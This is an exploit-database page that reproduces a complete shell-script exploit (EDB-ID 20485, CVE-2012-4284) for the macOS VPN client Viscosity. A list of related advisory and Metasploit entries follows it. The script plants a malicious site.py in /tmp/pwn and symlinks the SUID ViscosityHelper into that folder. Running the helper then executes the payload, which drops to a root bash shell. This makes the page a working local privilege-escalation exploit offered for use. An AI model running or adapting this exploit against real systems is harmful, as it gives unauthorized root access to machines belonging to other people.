Lucene search
Zx2c4EDB-ID:20485HistoryAug 13, 2012 - 12:00 a.m.
Viscosity - Local Privilege Escalation
2012-08-1300:00:00
zx2c4
www.exploit-db.com
15
#!/bin/sh
#
##########################
# Viscatory #
# #
# zx2c4 #
##########################
#
# After the hullabaloo from the Tunnelblick local root, savy Mac users
# began defending Viscosity, another OS X VPN client. They figured, since
# they spent money on Viscosity, surely it would be better designed than
# the free open-source alternative.
#
# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
# the win. Here, the SUID helper will execute site.py in its enclosing
# folder. A simple symlink, and we have root.
#
# greets to jono
#
# Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh
echo "[+] Crafting payload."
mkdir -p -v /tmp/pwn
cat > /tmp/pwn/site.py <<_EOF
import os
print "[+] Cleaning up."
os.system("rm -rvf /tmp/pwn")
print "[+] Getting root."
os.setuid(0)
os.setgid(0)
os.execl("/bin/bash", "bash")
_EOF
echo "[+] Making symlink."
ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
echo "[+] Running vulnerable SUID helper."
exec /tmp/pwn/rootRelated
packetstorm
packetstorm
Viscosity setuid-set ViscosityHelper Privilege Escalation
2013-03-05 00:00:00
cve
cve
CVE-2012-4284
2020-01-10 20:15:14
cvelist
cvelist
CVE-2012-4284
2020-01-10 19:09:55
nvd
nvd
CVE-2012-4284
2020-01-10 20:15:14
zdt
zdt
Viscosity setuid-set ViscosityHelper Privilege Escalation Vulnerability
2013-03-05 00:00:00
d2
d2
DSquare Exploit Pack: D2SEC_VISCOSITY
2020-01-10 20:15:00
exploitdb
exploitdb
Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)
2013-03-05 00:00:00
nessus
nessus
Viscosity ViscosityHelper Symlink Attack Local Privilege Escalation
2013-03-27 00:00:00
metasploit
metasploit
Viscosity setuid-set ViscosityHelper Privilege Escalation
2013-03-03 12:23:21
prion
prion
Privilege escalation
2020-01-10 20:15:00